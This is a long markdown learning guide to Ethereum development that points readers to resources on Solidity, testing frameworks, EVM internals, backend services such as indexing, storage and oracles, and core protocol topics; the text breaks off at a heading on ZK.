Writing decentralized applications (Dapps) requires knowing how to write smart contracts as they are pieces of code that live on blockchains that can be executed inside of virtual machines. To write contracts you need to learn the programming languages that are able to compile to a target that the virtual machine can understand. In the case of the Ethereum blockchain, we have the EVM which has a set of operations it supports (a.k.a OPCODES). The most popular language for writing smart contracts on Ethereum is Solidity, which is a statically typed, object-oriented high-level programming language that takes inspiration from C++, Python, and JavaScript. With Solidity, you can program logic that executes inside of the EVM and the result of its operations is stored on the blockchain forever. The state of these applications is easily accessible from a full-node or from a third-party data indexing platform. The goal of smart contract developers is to create secure applications which perform a certain action, for example, a contract that allows for users to swap tokens, to buy and sell NFTs, to vote on proposals, etc.
There are many different stages in the smart contract development stage, from experimentation, iteration, testing, auditing, testnet deployment, and mainnet deployments. There are also different sets of best practices that developers and production teams adopt in order to mitigate the security and economic risk of their applications. Another important part of writing smart contracts on Ethereum or Ethereum L2s is optimizing the contracts to minimize the amount of gas they consume. Since block space on Ethereum and L2s is limited, there needs to be a fee mechanism in order to avoid state bloat that gives a fixed gas price to each operation executed by the respective VM. That means that the more complex a smart contract is, the more expensive it will be to deploy and for the users to use. There are various design patterns that optimize the code to consume the least amount of gas possible, whilst remaining readable and secure.
#### Solidity
Solidity is by far the most popular language to write smart contracts at the moment as the EVM is the most widely adopted virtual machine out there. Not only is it used in Ethereum's execution layer, but many alt L1s and L2s on Ethereum use the EVM as their virtual machine since there's a fairly mature development ecosystem. In order to first learn Solidity, we'll go over a few simple courses that explain the principles of the language, and as we progress further we will talk about design patterns, testing, security, oracles, and more.
[CryptoZombies](https://cryptozombies.io/en/course/) is an interactive web application that teaches you the basics of Solidity through a fun development game. It teaches you how to create a contract, the data types that Solidity supports, how to write methods, how to manage objects, events, inheritance, memory management, interfaces, modifiers, and more. By the time you finish the first three short courses, you'll be able to read and write Solidity code. An alternative to CryptoZombies which is in video form is the [Solidity playlist](https://www.youtube.com/playlist?list=PLO5VPQH6OWdVQwpQfw9rZ67O6Pjfo6q-p) from [Smart Contract Programmer](https://www.youtube.com/channel/UCJWh7F3AFyQ_x01VKzr9eyA) on YouTube. This one is a bit better as it covers Solidity 0.8.0 which is a fairly recent version.
After we finish the course with the basics, we'll move on to building small projects implementing various different protocols, applications, and cryptographic primitives through the use of the [scaffold-eth](https://github.com/scaffold-eth/scaffold-eth) challenge that appear in [this thread](https://twitter.com/austingriffith/status/1483834810359377923?s=20&t=lkXzcAH2cT5xf7btyMAs0A). Scaffold-eth is a web3 development template built by [Austin Griffith](https://twitter.com/austingriffith) and open-source contributors which abstracts the backend of your app and creates a front-end interface for interacting with the smart contracts that you write. We will start with the [Ethereum Speed Run](https://speedrunethereum.com/
) challenges in the thread mentioned above, and continue with building more complex applications like a [signature-based multisig](https://github.com/scaffold-eth/scaffold-eth-examples/tree/meta-multi-sig), an [app that uploads images to IPFS](https://github.com/scaffold-eth/scaffold-eth/tree/image-upload-ipfs), and more.
Also a great way to learn solidty is to look through already written codes. For eg. https://solidity-by-example.org/
Now that you've been writing more and more complex smart contracts it is a good idea to start looking at other people's code to get a feel for how they implement different features, how they structure code, what designs and patterns they use, how they optimize for gas, and a lot more.
There are many techniques that you'll be picking up along on your journey in order to make your contracts more resource-effective and gas-optimized so that your users don't need to spend as much money for using your applications.
A good example of well-made smart contracts at the intermediate level are [Miguel Piedrafita](https://twitter.com/m1guelpf)'s [lil-web3](https://github.com/m1guelpf/lil-web3/tree/main/src) contracts. They are simple implementations of popular protocols and applications. They also have tests attached to them which are written using Foundry, which we will cover shortly. Take a look at how comments are written, how events and errors are used, how it is structured, gas minimization techniques he employs, try to understand the design of the protocol implementation, etc. Trying to implement your own versions of well-known applications and protocols is a great way to improve at Solidity as you'll learn a lot about the development process that you'll go through once you are writing production code at a company or DAO.
**Threads that talk about getting really good at Solidity**
- [Tips from Emilio Frangella @ Aave](https://twitter.com/The3D_/status/1485308693935763458?s=20&t=s2cbKFxvZ3tpjkFqcbyLfA)
- [Tips from @freddycoen](https://twitter.com/freddycoen/status/1485572733706682368)
- [Tips for non-beginners from @0xCacti](https://twitter.com/0xcacti/status/1485079302601207810?s=20&t=Iu2DlMREKnTAzGzifVZLMA)
- [Tips from @transmissions11](https://twitter.com/transmissions11/status/1485159010210770946?s=20&t=Iu2DlMREKnTAzGzifVZLMA)
Once you've gone through all of the above the best you can do to learn Advanced Solidity is to see what the best codebases look like. Look at how they structure their projects, what gas optimizations they use, what Solidity patterns they employ, how they do tests, how they create interfaces, how they handle events and errors, what libraries/dependencies do they use (if any), etc.
Examples of great codebases:
- [Uniswap v2](https://github.com/Uniswap/v2-core) / [Uniswap v3](https://github.com/Uniswap/v3-core)
- [Gnosis Safe](https://github.com/gnosis/safe-contracts)
- [Compound finance](https://github.com/compound-finance/compound-protocol)
- [Zora v3](https://github.com/ourzora/v3)
- [Rari Capital](https://github.com/Rari-Capital/vaults)
- [Ribbon Finance](https://github.com/ribbon-finance/ribbon-v2/tree/master/contracts)
- [AAVE](https://github.com/aave/aave-protocol)
- [SushiSwap](https://github.com/sushiswap/sushiswap)
#### Testing
Testing smart contracts is an essential part of the development process as it ensures that the code you write behaves as intended and is secure against various technical and economic exploits. Many different libraries are used by different teams, there are pros and cons to using each different library and in some cases, they can be used in a complementary fashion. We will cover the most popular ones among top-tier developers as well as the most commonly used ones like HardHat and Truffle.
Opinionated recommendations: Foundry and Hardhat
**Foundry**
[Foundry](https://github.com/gakonst/foundry) is the hottest library in the Ethereum development landscape, it is originally built by Georgios Konstantopoulos who is one of the most highly respected developers in the entire Ethereum ecosystem. Georgios is currently the CTO at Paradigm and part of his job is building tools for developers that will be used to create the applications of the future.
Foundry is composed of two parts: Forge and Cast.
- **Forge:** Forge is a fast and flexible Ethereum testing framework, inspired by Dapptools.
- **Cast:** Swiss army knife for interacting with EVM smart contracts, sending transactions, and getting chain data.
The library is written in Rust, which is a systems-level programming language that has memory safety, borrow checking, performant concurrency, and many other features which are making it one of the favorite languages used by developers across all fronts. Many popular libraries are being written in Rust, popular compiler targets like WASM are supported by Rust, a lot of Ethereum developer tooling is built using Rust or is refactoring their infrastructure to use Rust. It is a very exciting trend in blockchain development and many developers are learning the language to be able to contribute to these cool pieces of software. The best way to get started with Rust is [The Rust Book](https://doc.rust-lang.org/book/) and the [Rustlings repo](https://github.com/rust-lang/rustlings/).
The reason why Foundry is getting a lot of popularity and it is so important, is because Solidity tests should be written in Solidity and not in JavaScript. It is very hard to master two different languages at once and Solidity developers shouldn't be forced to learn it in order to be able to test their smart contracts. Foundry is also getting an increasingly superior development environment in terms of features. The main features for which you might use other toolkits are mainly deployment which is not supported by Foundry so far. For managing deployments, the standard toolkit is HardHat. For testing, gas optimization features, fuzzing, symbolic execution (hevm), etc, do use Foundry. Good resources for learning and mastering Foundry are:
- [The Foundry Book](https://book.getfoundry.sh/) - Community sourced documentation
- [Tweet from @andreasbigger](https://twitter.com/andreasbigger/status/1500209878433894400?s=20&t=5HKeV0q_h3Z3QoRvlkO_hQ):
- Familiarize yourself w/ [Forge-cli](https://github.com/gakonst/foundry/blob/master/cli/README.md)
- Checkout some templates:
- [FrankieIsLost forge template](https://github.com/FrankieIsLost/forge-template)
- [ZeframLou forge template](https://github.com/ZeframLou/foundry-template)
- [AndreasBigger femplate](https://github.com/abigger87/femplate)
- Dive into repos using Foundry:
- [lil-web3](https://github.com/m1guelpf/lil-web3/)
- [n3rp](https://github.com/GrantStenger/n3rp)
- [zen](https://github.com/zkSoju/zen)
- [cloaks](https://github.com/abigger87/cloaks)
- [ethernaut-x-foundry](https://github.com/ciaranmcveigh5/ethernaut-x-foundry)
- [damn-vulnerable-defi-foundry](https://github.com/nicolasgarcia214/damn-vulnerable-defi-foundry)
- [Multicall](https://github.com/mds1/multicall)
- [Brockelmore's testing verbosity with forge-std](https://github.com/brockelmore/forge-std)
**HardHat**
[Hardhat](https://hardhat.org/) is the Ethereum development library that’s the most widely used across the ecosystem and is the standard in most production codebases like Aave, Uniswap, and many others. Usually, all the deploy scripts, migration files, automation scripts, etc are written using Hardhat and their tooling suite. It is a javascript library (that has Typescript support). Recently the Hardhat team announced that they are moving their infrastructure to Rust as most of the tooling ecosystem is moving to use it do its performance and security.
**Truffle Suite**
[Truffle Suite](https://trufflesuite.com/) is a suite of tools developed by Consensys to locally test smart contracts by deploying them on a local instance of the Ethereum blockchain, mocking user addresses using the Ganache library, writing tests using Truffle, and creating on-chain data pipelines for user interfaces using Drizzle. It was one of the first complete Ethereum developer tooling ecosystems that were released, but they’ve fallen out of favor in recent years as libraries like Hardhat overtook it.
**Dapptools**
[Dapptools](https://github.com/dapphub/dapptools) is a suite of Ethereum focused CLI tools following the Unix design philosophy, favoring composability, configurability, and extensibility.
There are 4 key elements in Dapptools:
- **dapp** - All you need Ethereum development tool. Build, test, fuzz, formally verify, debug & deploy solidity contracts.
- **seth** - Ethereum CLI. Query contracts, send transactions, follow logs, slice & dice data.
- **hevm** - Testing-oriented EVM implementation. Debug, fuzz, or symbolically execute code against local or mainnet state.
- **ethsign** - Sign Ethereum transactions from a local Keystore or hardware wallet.
A cool innovation done by app tools was the hEVM which is an EVM implementation written in Haskell (a functional programming language) that allows to symbolically execute Solidity code and formally verify the results of the resulting bytecode (opcode operations). This feature was later adopted by Foundry, including many others that were first provided by Dapptools.
#### Design patterns
Once you're comfortable with writing more and more complex contracts and maybe taking a look at the front-end code and it interacts with the smart contracts, you'll start getting a feel for how smart contracts are designed from a more high-level view. There are certain designs and patterns which are commonplace, things like the approved pattern for tokens, and more. At this point, it is a good idea to start thinking more about the overall architecture of your code and the structure that it will take to efficiently implement the functionality you want to enable.
There are common patterns employed in smart contract development, this [Solidty-patterns](https://github.com/fravoll/solidity-patterns) repo implements some of them.
Since the EVM is such a constrained environment where each additional operation executed by the EVM adds gas costs to the execution of the smart contract, developers try to build as least resource-intensive contracts as possible whilst also maximizing readability and security. Since blockchains are a very adversarial environment were mistakes in a smart contract could lead to fund drains (RUGS) and exploits, it can be considered mission-critical software and so many developers get inspiration from other mission-critical software guidelines like the ones of NASA which are responsible for the lives of astronauts going to space. These development principles are guidelines that help optimize a codebase for maximum security through the adoption of a standardized procedure and developer mindset.
**ENS integration**
We mentioned how to integrate ENS domain names into your dapp within the [front end development section](#front-end-development), but as a smart contract developer you can also [resolve ENS domain names on-chain](https://docs.ens.domains/contract-developer-guide/resolving-names-on-chain), [write your own resolver](https://docs.ens.domains/contract-developer-guide/writing-a-resolver) which implements [EIP137](https://github.com/ethereum/EIPs/issues/137) or even [write your own registrar](https://docs.ens.domains/contract-developer-guide/writing-a-registrar).
#### Specialized languages
There are various programming languages that can be compiled into EVM bytecode, there are high-level programming languages such as Solidity, Vyper, or Fe, but there's also an intermediate programming language that's often used within gas-optimized contracts called Yul, or as a developer, you can write EVM assembly by writing the EVM opcodes directly. A common technique for gas minimization is writing Solidity code looking at the resulting EVM assembly code and comparing the gas cost of different implementations in order to make the contract as gas-efficient as possible.
- **Yul**
[Yul](https://docs.soliditylang.org/en/v0.8.12/yul.html) is an intermediate-level programming language that can compile into EVM bytecode. From the Solidity documentation:
"The design of Yul tries to achieve several goals:
- Programs written in Yul should be readable, even if the code is generated by a compiler from Solidity or another high-level language.
- Control flow should be easy to understand to help in manual inspection, formal verification, and optimization.
- The translation from Yul to bytecode should be as straightforward as possible.
- Yul should be suitable for whole-program optimization.
In order to achieve the first and second goals, Yul provides high-level constructs like `for` loops, `if` and `switch` statements and function calls. These should be sufficient for adequately representing the control flow for assembly programs. Therefore, no explicit statements for `SWAP`, `DUP`, `JUMPDEST`, `JUMP` and `JUMPI` are provided, because the first two obfuscate the data flow and the last two obfuscate control flow. Furthermore, functional statements of the form `mul(add(x, y), 7)` are preferred over pure opcode statements like `7 y x add mul` because, in the first form, it is much easier to see which operand is used for which opcode."
- **EVM Assembly**
[EVM Assembly](https://docs.soliditylang.org/en/v0.8.12/assembly.html) can be written inside of inline Solidity statements with the `assembly` keyword. It allows for more fine-grained control over the resulting bytecode. Oftentimes the compiler is unable to optimize Solidity code well and so it results in unnecessary gas costs.
There's also an `unchecked` keyword in Solidity which disables the overflow and underflow checks from the compiler which were introduced in Solidity 0.8.0 and before were part of the SafeMath library in OpenZeppelin libraries. The `unchecked` keyword is oftentimes used
Writing Yul or inline assembly can obfuscate the functionality of your code by making it less readable for other contributors/auditors and it can potentially introduce new risks as the Solidity compiler oftentimes performs various optimizations and security checks.
Good toolkits for writing EVM Assembly:
- [etk](https://github.com/quilt/etk)
- [huffc](https://github.com/JetJadeja/huffc)
- and the afforementioned Yul intermediate language
#### EVM deep dive
Understanding the ins and outs of the EVM is crucial for building highly optimized applications as each operation executed by the EVM has a gas cost attached to it and users have to pay the price for executing functions within the applications that they use. There is a compromise between readability and code optimizations however, which needs to be taken into consideration. Sometimes using techniques like bitshifting and bitmapping ([Hacker's Delight](https://github.com/lancetw/ebook-1/blob/master/02_algorithm/Hacker's%20Delight%202nd%20Edition.pdf) is a good book that talks about bit manipulation techniques in detail) can have a negative impact on readability and thus security, as other contributors and auditors may not be able to wrap their heads around these complex optimizations or it would simply take too much time for them to do so. For code that actually goes into production, each project needs to asses how much do they want to optimize their code for gas savings over readability. Security usually comes first, however there are still a set of well-known good practices that will allow you to save some gas. If you end up using gas optimization techniques it is also advised to document them well with comments inside of your Solidity contracts. Another important point is that as these technologies scale and developers are less constrained by the virtual machine executing smart contract bytecode, the needs for optimizations becomes less important along with the fact that the compilers converting static code to machine code are getting better and better at optimizing code for performance and low costs. As technologies like L2s and data availability layers become mainstream we also may see an emergence of new VM architectures that experiment with new designs that do not require developers to work with low-level optimizations as they will be highly performant and scalable.
For a comprehensive EVM deepdive, I suggest these resources:
- [Ethereum Explained: The EVM](https://www.youtube.com/watch?v=kCswGz9naZg&ab_channel=JordanMcKinney)
- [The EVM Handbook](https://noxx3xxon.notion.site/noxx3xxon/The-EVM-Handbook-bb38e175cc404111a391907c4975426d)
- [EVM development starter kit](https://freddycoen.medium.com/evm-starter-kit-1790bcc992ef)
- Read Chapter 13 (EVM) of [The Ethereum Book](https://github.com/ethereumbook/ethereumbook/blob/develop/13evm.asciidoc)
- Read Femboy Capital's [Playdate with the EVM](https://femboy.capital/evm-pt1)
- Go over OpenZeppelin's series on [Deconstructing smart contracts](https://blog.openzeppelin.com/deconstructing-a-solidity-contract-part-i-introduction-832efd2d7737/)
- Read [Analyzing smart contracts](https://costa.fdi.ucm.es/papers/costa/AlbertCGRR20bTR.pdf) by Elvira Albert (very math heavy)
- Read over [TakeNobu's slides on how the EVM works (visualized)](https://takenobu-hs.github.io/downloads/ethereum_evm_illustrated.pdf)
- Go over [design patterns section](#design-patterns)
- Go over the exemplary good codebases at the beginning of the [Solidity section](#solidity)
- Follow gas optimizoors like [@transmission11](https://twitter.com/transmissions11) for gas alpha
- Get used to going to lookup gas costs for different OPCODE operations at [EVM Codes](https://www.evm.codes/)
- Check out the [EVM execution specs](https://github.com/ethereum/execution-specs)
- Learn to use [Foundry](#testing) well
- Bonus resources in comments of [this Twitter thread](https://twitter.com/0x_doggie/status/1494025503446945799?s=20&t=jydW6zat0cCXAb3mUhPFWw)
Special thanks to [@0x_doggie] and [@freddycoen] from whose threads I extrapolated these resources. - [Thread 1](https://twitter.com/freddycoen/status/1485572733706682368)
- [Thread 2](https://twitter.com/0x_doggie/status/1496507944803848194)
You might wanna go through [Nick's Posts](https://ethereum.stackexchange.com/users/1254/nick-johnson) and [Jean's Solidity articles](https://jeancvllr.medium.com/solidity-tutorial-all-about-assembly-5acdfefde05c)
### Backend development
As far as blockchain development goes, most of the logic that traditional applications would consider backend is encapsulated within smart contracts, however, there are also complementary technologies that allow you to query data from blockchains, index the data, create databases so that you have on-demand data from custom APIs, decentralized storage for content, user authentication / DID, etc. I wouldn't consider this its own specialization, but it is a sufficiently unique skill set for me to cover it separately.
This image was created by my fren [Nader Dabit](https://twitter.com/dabit3) who is a full-stack blockchain developer that has created many useful guides, some of which I'll feature in the full-stack development section. This web3 stack landscape graphic comes from a recent blog post of his called [The complete guide to full-stack web3 development](https://dev.to/dabit3/the-complete-guide-to-full-stack-web3-development-4g74).
![web3 stack.png](./images/web3_stack.jpeg)
#### Decentralized File Storage
There are many applications that require storing files of all sorts and making them available for your decentralized applications, NFTS for example only have a link to the URI metadata on-chain, and that URI points to a decentralized storage endpoint on IPFS or Arweave. Meaning that all the images and the traits of the NFT are hosted in their file storage networks rather than on the Ethereum mainnet in order to save on costs and allow for higher bandwidth.
**IPFS**
[IPFS](https://ipfs.io/) is one of the most popular decentralized file storage solutions out there, there are projects like [Filecoin](https://filecoin.io/) being built on top and many NFT metadata are hosted inside of the network. There are solutions like [NFT Storage](https://nft.storage/docs/) that make the metadata hosting completely free to upload your NFT metadata on-chain by leveraging their Javascript API.
**Arweave**
[Arweave](https://www.arweave.org/) is another such solution. Arweave is a type of storage that backs data with sustainable and perpetual endowments, allowing users and developers to truly store data forever – for the very first time. As a collectively owned hard drive that never forgets, Arweave allows developers to remember and preserve valuable information, apps, and history indefinitely.
An increasingly popular use case of decentralized file storage solutions is web hosting, since we are on a quest to build decentralized applications that are uncensorable, it is good practice to also decentralize the user interface by deploying it on decentralized file storage networks like IPFS and Arweave. This prevents the applications you built from being censored by centralized entities shutting down your deployments on centralized platforms like Vercel, AWS, Azure, or any other. Part of good practices of modern applications is open-sourcing the front end of their applications so that anyone can run them locally and also deploying several other instances to decentralized file storage solutions as well as usually hosting their own front end in a centralized server for added performance.
#### Indexing / Querying
The applications you will be building need to know what is the state of the blockchain so that your users know what is happening and can interact with the application effectively. An example of this is Uniswap's AMM. In order to call the swap function in the smart contracts, you need to know how many tokens you will get back with an X amount of ETH that you put into the contract. In order to display the current price of any asset, your application will either query data from the blockchain directly or it will use an indexing service that has that data already available. These APIs are very useful and are a critical part of any application.
**TheGraph**
A very popular service is [TheGraph](https://thegraph.com/en/). TheGraph is a decentralized indexing protocol that allows you to query networks like Ethereum, the protocol has an incentive layer that rewards indexers to create APIs for the data you specify. Developers can create so-called subgraphs, which are data APIs that make the data easily accessible through a GraphQL schema. GraphQL is a querying language that is used as an alternative to traditional REST APIs. GraphQL schemas are harder to set up initially, but in turn, they enjoy massive scalability. In order to learn more, check out [their documentation](https://thegraph.com/docs/en/). To learn how GraphQL works checkout the [official documentation](https://graphql.org/learn/), [HowToGraphQL](https://www.howtographql.com/) and [this YouTube playlist](https://www.youtube.com/watch?v=Y0lDGjwRYKw&list=PL4cUxeGkcC9iK6Qhn-QLcXCXPQUov1U7f&ab_channel=TheNetNinja) (although it may be a bit outdated by now, better check the documentation).
**CovalentHQ**
An upcoming service and simpler alternative to TheGraph is [Covalent](https://www.covalenthq.com/). Its API allows you to pull detailed, historical and granular data from multiple blockchains with no code. It has a rich palette of endpoints serving data from categories including balances, NFTs, and DeFi. The APIs provide data for several different blockchains like Ethereum, Polygon, Avalanche and is currently free to use. In order to learn more, check out [their documentation](https://www.covalenthq.com/docs/) and [API docs](https://www.covalenthq.com/docs/api/#/0/0/USD/1). They have an active [youtube channel](https://www.youtube.com/channel/UCGn-T9qPiXAx490Wr6WPbOw) as well with a [playlist on building web3 projects](https://www.youtube.com/playlist?list=PL4d9xIzK1us3vqIFYqcS005qSVuq_AESa) using Covalent.
**Nodes as service**
One of the most common ways to query data from the blockchain is by calling RPC endpoints of nodes that are syncing the full-state of the blockchain. A node runs the Ethereum blockchain, has all of its state, and syncs periodically every single time a new block appears. You can run your own node on consumer hardware, but it is unscalable if you want to use those nodes for querying data for massive applications as you'd need to build your own DevOps pipelines in order to scale to your needs accordingly. That's why most developers use a third-party node provider like [Alchemy](https://www.alchemy.com/), [Nodereal](https://nodereal.io), or [Infura](https://infura.io/). You can call these APIs by using web3 libraries like [ethers.js](https://docs.ethers.io/v5/), [web3.js](https://web3js.readthedocs.io/en/v1.7.0/) or myriad others.
**Moralis**
[Moralis](https://moralis.io/) is a web3 development platform that automates your backend, instead of having to query data from nodes, indexing the data, and creating databases so that you don't need to query the blockchain on every user request, Moralis does it for you. You instantiate a Moralis server that exposes an API to all blockchain data through a REST API to a PostgreSQL database. It also has smart contract alerts, cloud functions, cross-chain user authentication, and more. The only downside of using Moralis is that it's a centralized service provider. It is the easiest way to get a backend for your Dapp going as Moralis has a very simple to use SDK that helps you tap into the APIs offered by their services. It is a great way to get started building backends as most of the heavy lifting is done for you.
To learn how to use Moralis checkout [their documentation](https://docs.moralis.io/introduction/readme) and [their YouTube channel](https://www.youtube.com/channel/UCgWS9Q3P5AxCWyQLT2kQhBw).
**Thirdweb**
[Thirdweb](https://thirdweb.com/) provide smart contracts, SDKs and UI components that creators, game studios and developers can integrate into their app
To learn how to use Thirdweb checkout [their documentation](https://portal.thirdweb.com/)
#### Oracles
Oracles are data feeds that bring off-chain data on-chain so that the smart contracts that you build can query real-world information and build logic around it. For example, prediction market Dapps use oracles to settle payments based on events. A prediction market may ask you to bet your ETH on who will become the next president of the United States. They'll use an oracle to confirm the outcome and payout to the winners.
- [What is an oracle? - Chainlink](https://youtu.be/ZJfkNzyO7-U?t=10)
[Chainlink](https://chain.link/) is the most popular oracle out there, you'll usually use it to get price feeds, to get verifiable randomness, to call external APIs, etc. If you want to get started building with Chainlink, go to [their documentation](https://docs.chain.link/).
#### DID / Authentication
DID (decentralized identity) and web3 user authentication are a disruptive new primitive on the internet as we can be self-sovereign users of the internet and own our own value within it for the first time in human history. Usually, your user profile is managed by centralized service providers like Google, Facebook, Apple, Amazon, and others. In web3, the concept of a digital identity is much broader as it can span many more different areas such as financial history, games, social interaction (decentralized social media, i.e. [Lens Protocol](https://github.com/aave/lens-protocol)), and much more. It is still not clear how web3 user management will look like a few years from now, but there are a few solutions that are being standardized and are emerging as potential winners.
**SpruceID**
[SpruceID](https://www.spruceid.com/) is a decentralized identity toolkit that allows users to sign and verify W3v verifiable credentials which are configurable across many interfaces. Use cases cited in the [SpruceID documentation](https://spruceid.dev/docs/) include: Authenticity for NFT creators, decentralized backup or recovery of decentralized identity, decentralized on-boarding for private DeFi pools, decentralized app-hosting, and many more potential use cases in the future. In order to integrate the Spruce DID solutions visit their developer portal.
**Sign-in with Ethereum**
[Sign-in with Ethereum](https://login.xyz) is an initiative that came off [EIP-4361](https://eips.ethereum.org/EIPS/eip-4361) which set off to standardize how Ethereum accounts interact and authenticate with off-chain services by signing a standard message format parameterized by scope, session details, and security mechanisms (e.g., a nonce). The goals of this specification are to provide a self-custodied alternative to centralized identity providers, improve interoperability across off-chain services for Ethereum-based authentication, and provide wallet vendors a consistent machine-readable message format to achieve improved user experiences and consent management.
Many application builders have already adopted this signature standard for building applications on Ethereum as it streamlines the process for everyone and makes it more seamless for users since they have easily readable signatures from [EIP-191](https://eips.ethereum.org/EIPS/eip-191). The aim of this EIP specification is to create a login standard similar to how web2 login with Google and Facebook became catalysts for adoption.
#### Automation
Within blockchain applications there are many actions that are repetitive and cumbersome to execute, for example, having to change the liquidity provision ranges inside of an active Uniswap v3 liquidity provision strategy, claiming rewards from yield vaults, and many other actions that users would like to automate so as to not have to deal with manual execution overhead.
**Gelato network**
[Gelato Network](https://www.gelato.network) is an automation protocol that runs as a decentralized network of bots used by web3 developers to automate smart contract executions on public EVM compatible blockchains including Ethereum, Polygon, Fantom, Arbitrum, Binance Smart Chain, and Avalanche.
In order to get started automating tasks inside of your application check out the [official Gelato documentation](https://docs.gelato.network/guides/tutorial) which has tutorials on how to set up bots to regularly execute any given task in exchange for a small transaction fee.
The setup inside of the contract function that you want bots to run would look something like this:
![gelato.png](./images/gelato.png)
#### Miscellaneous APIs
When building applications you will want to display miscellaneous information from various different other applications or protocols, e.g. price feeds for different tokens on different AMMs, the price of NFTs listed on different marketplaces, various data from services your application relies on, etc. As a backend developer, your responsibilities are to know where you can find reliable sources of data for your application and build the infrastructure needed to fetch it so that frontend developers can display it on the site. It is also important to build redundancy of the data you query and store it in your own databases in order to prevent your application from failing in the case of API dependency failure.
**Opensea**
A good example of such an API is [OpenSea’s API](https://docs.opensea.io/reference/api-overview) which is public and can be queried in order to get the prices of NFT listings OpenSea, get floor prices, volumes, a bunch of other prices historical data, NFT metadata, and more.
As a developer, you can also create your own databases and API endpoints to fetch data from those databases. It is also a good way to earn revenue, by creating SaaS services around API keys with rate limits for how much data anyone can query off your servers. For building APIs you can for example use a REST API infrastructure with NodeJS and PostgreSQL, or for example, you can write a TheGraph subgraph.
### Full-stack blockchain development
As the name implies, full-stack blockchain development is the closest specialization to being a jack of all trades. It involves building out all of the aspects of an application from front end, to smart contracts, to backend (at least to a certain degree). This is the most generic role that most blockchain developers will take and most companies and DAOs are looking for in a contributor. Since there is such a high demand for quality developers in the space, it is oftentimes the case that employers onboard people from different fields and turn them into a jack of all trades within web3 development so as to save costs and reduce HR resource requirements (which are incredibly scarce nowadays).
Since rewriting the [front end](#front-end-development), [back end](#back-end-development) and [smart contract](#smart-contract-development) sections would be pointless, I'll dedicate this section just to list a bunch of full-stack guides, tips and tricks, deployment guidelines, project management, and other relevant information.
#### Full-stack guides
- [Introduction to Ethereum Development](https://www.youtube.com/watch?v=MlJPjJQZtC8) - [Austin Griffith](https://twitter.com/austingriffith)
- [The Complete Guide to Full Stack Web3 Development](https://dev.to/dabit3/the-complete-guide-to-full-stack-web3-development-4g74) - [Nader Dabit](https://twitter.com/dabit3)
- [Speed Run Ethereum](https://speedrunethereum.com/) - [Austin Griffith](https://twitter.com/austingriffith)
- [Solidity, Blockchain, and Smart Contracts Course - Beginner to Expert Python Tutorial](https://www.youtube.com/watch?v=M576WGiDBdQ) - [Patrick Collins](https://twitter.com/PatrickAlphaC)
- [Full-stack blockchain solidity course](https://github.com/smartcontractkit/full-blockchain-solidity-course-py) - [Patrick Collins](https://twitter.com/PatrickAlphaC)
#### Full-stack tutorials
- [Introduction to Ethereum](https://www.youtube.com/watch?v=MlJPjJQZtC8)
- [Build Uniswap Blockchain Web3 App with Solidity | Next.js | Sanity.io](https://www.youtube.com/watch?v=xXxjRzdYIss)
#### Building and deploying on L2s and DA layers
Coming soon
#### Optimism
- [Developer docs](https://community.optimism.io/docs/developers/)
- [New Bedrock protocol specs](https://github.com/ethereum-optimism/optimistic-specs/)
#### Arbitrum
- [Developer docs](https://developer.offchainlabs.com/docs/developer_quickstart)
- [Protocol description](https://developer.offchainlabs.com/docs/rollup_protocol)
#### zkSync
- [Developer docs](https://docs.zksync.io/dev/)
- [New 2.0 docs](https://v2-docs.zksync.io/dev/)
#### Starknet / StarkEx
- [StarkNet / Cairo docs](https://starknet.io/docs/)
### Core protocol development
#### General Learning
There are many topics to learn about in core-development, one can specialize in any area. Here is a selection of learning-resources.
Basic:
- Merkle trees:
- [Ethereum execution-layer Merkle Patricia Tree walkthrough](https://dzone.com/articles/ethereum-yellow-paper-walkthrough-27)
- [Execution and Consensus layer Merge design](https://www.youtube.com/watch?v=8N10a1EBhBc), video by Danny Ryan
- [Rollup centric roadmap](https://ethereum-magicians.org/t/a-rollup-centric-ethereum-roadmap/4698), post by Vitalik
- Ethereum protocol ELI5 (coming soon)
Medium:
- [Yellow Paper](https://ethereum.github.io/yellowpaper/paper.pdf): L1 protocol specification in paper form
- [ABI: Application Binary Interface](https://docs.soliditylang.org/en/v0.8.11/abi-spec.html) to interact with contracts
- [EVM opcodes](https://www.evm.codes/): interactive reference
- [RLP](https://eth.wiki/fundamentals/rlp): the encoding used everywhere in execution-layer
- [SSZ specs](https://github.com/ethereum/consensus-specs/blob/dev/ssz/simple-serialize.md): encoding and merkleization of Eth2,
also see [visualized encoding](https://github.com/protolambda/eth2-docs/blob/master/eth2-ssz.svg)
and [visualized hash-tree-root](https://github.com/protolambda/eth2-docs/blob/master/eth2-htr.svg).
- [EVM](https://ethereum.org/en/developers/docs/evm/): overview of the machine that runs smart-contracts
- Executable specs: readability-first python implementations of the protocol specification.
- [Consensus-layer](https://github.com/ethereum/consensus-specs), also see [pip package](https://pypi.org/project/eth2spec/)
- [Execution-layer](https://github.com/ethereum/execution-specs), also see the [rendered version](https://ethereum.github.io/execution-specs/).
- [Simplified Eth2 Phase0 specs intro](https://notes.ethereum.org/@djrtwo/Bkn3zpwxB)
- [Light client design](https://www.youtube.com/watch?v=ysW-Bq05pJQ) and [implementation](https://www.youtube.com/watch?v=bX8I9U2PYMk)
Advanced:
- Builder proposer separation:
- [Proposer/block builder separation-friendly fee market designs](https://ethresear.ch/t/proposer-block-builder-separation-friendly-fee-market-designs/9725)
- [Flashbots: frontrunning the MEV crisis](https://ethresear.ch/t/flashbots-frontrunning-the-mev-crisis/8251)
- [state of research](https://notes.ethereum.org/@vbuterin/pbs_censorship_resistance) and
- [Fork-choice Gasper paper: Combining GHOST and Casper](https://arxiv.org/abs/2003.03052)
- [Dagger-Hashimoto (legacy PoW)](https://eth.wiki/concepts/dagger-hashimoto)
- State DB design, Erigon docs:
- [Choice of storage engine](https://github.com/ledgerwatch/erigon/wiki/Choice-of-storage-engine)
- [State representation](https://github.com/ledgerwatch/erigon/blob/devel/docs/programmers_guide/guide.md)
- BLS:
- [Signature aggregation in eth2](https://ethresear.ch/t/pragmatic-signature-aggregation-with-bls/2105) by Justin Drake
- [BLS12-381 For The Rest Of Us](https://hackmd.io/@benjaminion/bls12-381) by Ben Edgington
- [BLS Signature for Busy People](https://gist.github.com/paulmillr/18b802ad219b1aee34d773d08ec26ca2) by Paul Miller
- KZG:
- [KZG polynomial commitments](https://dankradfeist.de/ethereum/2020/06/16/kate-polynomial-commitments.html) by Dankrad Feist
- [ZK Study Club part 1: polynomial commitments](https://www.youtube.com/watch?v=bz16BURH_u8) by ZK FM podcast with Justin Drake
- ZK:
